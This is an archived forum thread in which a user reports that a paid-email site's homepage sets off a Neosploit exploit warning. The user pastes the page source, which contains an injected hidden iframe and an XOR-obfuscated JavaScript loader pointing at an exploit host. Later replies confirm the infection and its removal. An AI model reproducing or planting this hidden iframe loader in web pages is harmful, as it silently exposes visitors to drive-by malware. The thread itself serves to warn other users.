URL Sorce code: hxxp://classical-mail.cxm/pages/index.php?refid=
Triggers an Exploit Neosploit warning on my AV.
This extracted from the source code below loads MSN Homepage;
<iframe name="StatPage" src="hXXp://golden-corps.com/script.php" width=5 height=5 style="display:none"></iframe>
This could be the source of the AV warning, again extracted from the code below;
<script language="JavaScript">
var0 = "\x69\x3c\x33\x27\x34\x38\x30\x75\x3b\x34"; var1 = "\x38\x30\x68\x77\x06\x21\x34\x21\x05\x34"; var2 = "\x32\x30\x77\x75\x26\x27\x36\x68\x77\x3d"; var3 = "\x21\x21\x25\x6f\x7a\x7a\x32\x3a\x39\x31"; var4 = "\x30\x3b\x78\x36\x3a\x27\x25\x26\x7b\x36"; var5 = "\x3a\x38\x7a\x37\x34\x3b\x3b\x30\x27\x67"; var6 = "\x7b\x25\x3d\x25\x77\x75\x22\x3c\x31\x21"; var7 = "\x3d\x68\x60\x75\x3d\x30\x3c\x32\x3d\x21"; var8 = "\x68\x60\x75\x26\x21\x2c\x39\x30\x68\x77"; var9 = "\x31\x3c\x26\x25\x39\x34\x2c\x6f\x3b\x3a"; var10 = "\x3b\x30\x77\x6b\x69\x7a\x3c\x33\x27\x34"; var11 = "\x38\x30\x6b";
sr = var0+var1+var2+var3+var4+var5+var6+var7+var8+var9+var10+var11;
dst = "";
for(i = 0; i < sr.length; i++) {
var d = parseInt(sr.charCodeAt(i) ^ 85);
dst = dst + String.fromCharCode(d);
}
document.getElementById("banner").innerHTML = dst;
</script>
The source code intact;
<html>
<head>
<title>Classical-Mail.com - Fastest Growing Rewarding Program</title>
<iframe name="StatPage" src="hxxp://golden-corps.com/script.php" width=5 height=5 style="display:none"></iframe>
<meta name="keywords" content="Advertising, Get Paid to Surf the Web, Get Paid to Surf, Earn Free Money, paid surfing, viewbars, mlm, make money with web site, cashbars, get paid to search the web, get paid to read emails, referrals, sponsors, affiliate programs, ads, sponsors, associate programs, partner programs, webmaster, revenue, commissions, affiliates, associates, surf for pay, surf for cash, surf to earn, directories, partners, referrals, program, sell, income, money making, business opportunities, get paid to surf the net, free, easy money, cash, money, extra income, online, earn money at home, freebies, Internet, money tree, make money, top, top sites, top money sites, mlm, easy, pay, paid, earn, cash, chat, affiliates, www, web, residual, email, xxxxxxx">
<meta name="Description" content="xxxxxxxxx - Get paid to read emails">
<meta name="ROBOTS" content="ALL">
<meta name="distribution" content="global">
<meta name="distribution" content="global">
<style TYPE="text/css">
<!--
.bullet {
font-family: Tahoma, Verdana, Arial, Helvetica;
font-size: 12px;
color: #DDDDDD
}
.menutext {
font-family: Tahoma, Verdana, Arial, Helvetica;
font-weight: bold;
color: #FFFFFF
}
a:link {
font-family: Tahoma, Verdana, Arial, Helvetica;;
font-size: 12px;
color: #DDDDDD;
text-decoration: none
}
a:hover {
font-family: Tahoma, Verdana, Arial, Helvetica;;
font-size: 12px;
color: #FFFFFF;
text-decoration: underline
}
a:visited {
font-family: Tahoma, Verdana, Arial, Helvetica;;
font-size: 12px;
color: #DDDDDD;
text-decoration: none
}
A.menu:link {
font-family: Tahoma, Verdana, Arial, Helvetica;;
font-size: 12px;
color: #DDDDDD;
text-decoration: none;
font-weight: bold
}
A.menu:visited {
font-family: Tahoma, Verdana, Arial, Helvetica;;
font-size: 12px;
color: #DDDDDD;
text-decoration: none;
font-weight: bold
}
A.menu:hover {
font-family: Tahoma, Verdana, Arial, Helvetica;;
font-size: 12px;
color: #FFFFFF;
text-decoration: underline;
font-weight: bold
}
body {
font-family: Tahoma, Verdana, Arial, Helvetica;;
font-size: 12px;
color: #DDDDDD;
background-color: #000000;
margin: 0px 0px
}
.p,td {
font-family: Tahoma, Verdana, Arial, Helvetica;;
font-size: 12px;
color: #DDDDDD
}
.style1 {color: #DDDDDD}
-->
</style>
</head>
<body>
<script language="JavaScript">
var0 = "\x69\x3c\x33\x27\x34\x38\x30\x75\x3b\x34"; var1 = "\x38\x30\x68\x77\x06\x21\x34\x21\x05\x34"; var2 = "\x32\x30\x77\x75\x26\x27\x36\x68\x77\x3d"; var3 = "\x21\x21\x25\x6f\x7a\x7a\x32\x3a\x39\x31"; var4 = "\x30\x3b\x78\x36\x3a\x27\x25\x26\x7b\x36"; var5 = "\x3a\x38\x7a\x37\x34\x3b\x3b\x30\x27\x67"; var6 = "\x7b\x25\x3d\x25\x77\x75\x22\x3c\x31\x21"; var7 = "\x3d\x68\x60\x75\x3d\x30\x3c\x32\x3d\x21"; var8 = "\x68\x60\x75\x26\x21\x2c\x39\x30\x68\x77"; var9 = "\x31\x3c\x26\x25\x39\x34\x2c\x6f\x3b\x3a"; var10 = "\x3b\x30\x77\x6b\x69\x7a\x3c\x33\x27\x34"; var11 = "\x38\x30\x6b";
sr = var0+var1+var2+var3+var4+var5+var6+var7+var8+var9+var10+var11;
dst = "";
for(i = 0; i < sr.length; i++) {
var d = parseInt(sr.charCodeAt(i) ^ 85);
dst = dst + String.fromCharCode(d);
}
document.getElementById("banner").innerHTML = dst;
</script>
<table border="0" align="center" cellpadding="0" cellspacing="0" bgcolor="#000000">
<tr>
<td align="center" class="menutext" colspan="2" bgcolor="#000066">
<table border="0" cellpadding="0" cellspacing="0" name="Logo_Banner" height="100">
<tr>
<td align="left" nowrap colspan="2"><img src="2.jpg" width="1002" height="49" usemap="#Map" border="0"><map name="Map"><area shape="rect" coords="357,16,400,33" href="/pages/index.php"><area shape="rect" coords="418,16,480,33" href="/pages/enter.php"><area shape="rect" coords="500,15,556,34" href="/pages/confirm.php"><area shape="rect" coords="577,16,641,33" href="/pages/advertise.php"><area shape="rect" coords="668,14,711,33" href="/pages/terms.php"><area shape="rect" coords="740,15,795,33" href="/pages/privacy.php"><area shape="rect" coords="829,15,866,34" href="/pages/help.php"><area shape="rect" coords="902,14,979,33" href="/pages/contact.php"></map></td>
</tr>
<tr>
<td background="3.jpg" align="left" nowrap colspan="2" height="182">
<div align="center"> <table border=0 cellpadding=0 cellspacing=0 bgcolor=ffffff><tr><td><a href=hxxp://www.classical-mail.com/scripts/runner.php?BA=89&hash=
e3cb8d02ebd5b95d172f163aaf92a455&url=
hxxp%3A%2F%2Floading-mails.com%2Fpages%2Findex.php%3Frefid%3D16888
target=_blank><img src=hxxp://www.classical-mail.com/scripts/runner.php?REDIRECT=hxxp%3A%2F%2F
www.loading-mails.com%2
Fimages%2Fbanner.gif&hash=587316aaa4a382ec3861b21814d65503 alt="" border=0></a></td></tr></table> </div>
</td>
</tr>
</table>
</td>
</tr>
<tr>
<td background="bg.jpg" align="center" valign="top" bgcolor="#23233B" class="menutext">
<table width="200" border="0" align="center" cellpadding="3" cellspacing="3" name="Menu">
<tr>
<td class="menutext" height="15" width="8%"> </td>
<td class="menutext" height="15"> </td>
</tr>
<tr>
<td class="menutext" height="15" width="8%"> </td>
<td class="menutext" height="15">Total Members: 4,517</td>
</tr>
<tr>
<td class="menutext" height="15" width="8%"> </td>
<td class="menutext" height="15"> </td>
</tr>
<tr>
<td class="menutext" height="15" width="8%"> </td>
<td class="menutext" height="15">Total Payouts: 49,526.64
</td>
</tr>
<tr>
<td class="menutext" height="15" width="8%"> </td>
<td class="menutext" height="15"><b>Mails in queue</b>: <font face="Verdana, Arial, Helvetica, sans-serif" size="2">
881 </font></td>
</tr>
<tr>
<td class="menutext" height="15" width="8%"> </td>
<td class="menutext" height="15"><b>Ads in rotation: <font face="Verdana, Arial, Helvetica, sans-serif" size="2">
6 </font></b></td>
</tr>
<tr>
<td class="menutext" height="15" width="8%"> </td>
<td class="menutext" height="15"> </td>
</tr>
<tr>
<td class="menutext" height="15" width="8%"> </td>
<td class="menutext" height="15"><font size="4"><u>Partners
Sites</u></font></td>
</tr>
<tr>
<td class="menutext" height="15" width="8%"> </td>
<td class="menutext" height="15"><a href="hxxp://www.avant-cash.com">Avant-Cash.com</a></td>
</tr>
<tr>
<td class="menutext" height="15" width="8%"> </td>
<td class="menutext" height="15"> </td>
</tr>
<tr>
<td class="menutext" height="15" width="8%"> </td>
<td class="menutext" height="15"><u><font size="4"><b><font face="Tahoma">Featured
Sites</font></b></font></u></td>
</tr>
<tr>
<td class="menutext" height="15" width="8%"> </td>
<td class="menutext" height="15">
<p><a href="hxxp://www.lotosus.com/">Affordable and Quality Web
Hosting for Sale</a></p>
</td>
</tr>
<tr>
<td class="menutext" height="15" width="8%"> </td>
<td class="menutext" height="15"> </td>
</tr>
<tr>
<td class="menutext" height="15" width="8%"> </td>
<td class="menutext" height="15"> </td>
</tr>
<tr>
<td class="menutext" height="15" width="8%"> </td>
<td class="menutext" height="15"><u><font size="4"><b><font face="Tahoma">Sponsors
Links</font></b></font></u><br>
</td>
</tr>
<tr>
<td height="15" class="menu" width="8%"> </td>
<td height="15" class="menu">
<p><b><a href="hxxp://www.getpaidforum.net/" target="_blank">Get Paid
to Post & Reffer</a></b></p>
</td>
</tr>
<tr>
<td height="15" class="menu" width="8%"></td>
<td height="15" class="menu"> </td>
</tr>
<tr>
<td height="15" width="8%"> </td>
<td height="15"> </td>
</tr>
</table>
</td>
<td valign="top" bgcolor="#23233B" align="center">
<table border="0" cellpadding="0" cellspacing="0" height="400" name="Body">
<tr>
<td valign="top">
<!--Begin Body -->
<br> <body bgcolor="#23233B">
<table width="598" border="0" cellspacing="3" cellpadding="3" align="center">
<tr>
<td align="left" valign="top"> <!-- Begin BidVertiser code -->
<script LANGUAGE="JavaScript1.1" SRC="hxxp://bdv.bidvertiser.com/BidVertiser.dbm?pid=4910&bid=9941"></SCRIPT>
<noscript><a href="hxxp://www.bidvertiser.com">pay per click advertising</a></noscript>
<!-- End BidVertiser code --> </td>
</tr>
<tr>
<td align="left" valign="top" height="10"> </td>
</tr>
<tr>
<td align="left" valign="top"><font face="Verdana">
<font size="4"><b>We are 3 Years old now</b></font><b><font size="4">! -
Classical-Mail.com</font></b></font><p>
<b><a target="_blank" href="../note.htm">
<font color="#FF0000" face="Verdana">You wanna
learn more about the truth of boycott on this great site?</font></a></b></td>
</tr>
<tr>
<td align="left" valign="top">
กก</td>
</tr>
<tr>
<td align="left" valign="top">
<font face="Verdana" size="4">We just performed a database cleanup job on 3rd April
2008, click
<a target="_blank" href="hxxp://www.classical-mail.com/pages/20080402.txt">
<b><U>here</U></b></a> to see accounts that have been purged from database, and
<a target="_blank" href="hxxp://www.classical-mail.com/pages/20080402.gif">
<b><U>here</U></b></a> for the latest statistic before database cleanup.</font></td>
</tr>
<tr>
<td align="left" valign="top">
กก</td>
</tr>
<tr>
<td align="left" valign="top">
<p>
<h2><font face="Tahoma">Members</font></h2>
<font size="2" face="Tahoma"><font size="1"><b>•</b></font><b> Backup
done Daily<font size="1">.<br>
•</font> FREE Membership, </font>(<a href="gold.php"><font face="Tahoma">Upgraded Membership also
Available here</font></a><font size="2" face="Tahoma">)<br>
<font size="1">•</font> 0-2.5% Fees Payouts, Ads Processed On Weekly Basis.<br>
<font size="1">•</font> Upto 1c Per Link, Search links From 0.5c.<br>
<font size="1">•</font> Cash for Paid Mails only, Points for PTP Banner
Advertisement.<br>
<font size="1">•</font> Low $0.5 Min Payout which can be reached within
a few days.<br>
<font size="1">•</font> <u>We do not accept Proxy users anymore!</u><br>
<font size="1">•</font> No Turning Numbers but we don't tolerate Blind
Clickers.<br>
<font size="1">•</font> No Sponsor Ads Within Paid Mails.<br>
<font size="1">•</font> No Shared Email Only Solo Email.<br>
<font size="1">•</font> We Only Accept Members From:</font></b><p>
<font size="2" face="Tahoma">Australia, Austria, Belgium, Canada,
Denmark, Finland, France, Germany, Greece, Iceland, Netherlands,
New Zealand, Norway, Spain, Sweden, Switzerland, United Kingdom and
United States. </font>
</td>
</tr>
<tr>
<td align="left" valign="top" height="30">กก</td>
</tr>
<tr>
<td align="left" valign="top" width="100%">
<h2><font face="Tahoma">Advertisers</font></h2>
<p><font size="2" face="Tahoma"> <font size="1"><b>•</b></font> The
most cost effective advertising.<br>
<font size="1"><b>•</b></font></font><b><font face="Tahoma"><font size="2">
Guaranteed Clickthru Ad Options.</font></font></b><font face="Tahoma"><font size="2"><br>
<font size="1"><b>•</b></font> eMail Advertising or Banner Advertising.<br>
<font size="1"><b>•</b></font><b> Advertise to 100% opt in membership.</b><br>
<font size="1"><b>•</b></font> Members are eager to receive
your ads.<br>
<font size="1"><b>•</b></font> Absolutely no Spam!<br>
</font><font face="Tahoma"><font size="2"><a href="hxxp://www.classical-mail.com/pages/note.htm"><font size="1"><b>•</b></font><b>
No Incentive/Begging adwords For Search Ads!</b></a></font></font><font size="2"></font><font size="2"><br>
<font size="1"><b>•</b></font><b> Inactive members are deleted every
15 days.</b><br>
<font size="1"><b>•</b></font> <b>Cheaters are deleted on daily basis.</b><br>
<font size="1"><b>•</b></font> We will customize your Ad Campaign.<br>
<font size="1"><b>•</b></font> Reliable, Friendly Service.</font></font></p>
</td>
</tr>
</table>
<br>
<!--End Body -->
</td>
</tr>
</table>
</td>
</tr>
<tr>
<td background="4.jpg" colspan="2" align="center" height="55"><font font="font" color="#FFFFFF" size="2"><b><font face="Tahoma" color="#DDDDDD">©
All Rights Reserved 2004-2008 Classical-Mail.com</font></b></font></td>
</tr>
</table>
<center>
</center>
</body>
</html>
Full Version: [Resolved] Classical-Mail = Neosploit
Get Paid Forum - Get Paid Discussion > Get Paid To Programs > Sites Allegedly with problems of hacking/virus/0-iframes, autosearches etc ... > Sites hit by virusses or hacked
Yes, you're right, it is the golden-corps with the exploit/trojan. It's hacker code that's appeared on a few sites lately 
Thank you for confirming wagdoll, I wasn't 100% sure. I have also received a reply from the PO saying thank you for the notification and it's been removed 
Take care,
Craig
Take care,
Craig
This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.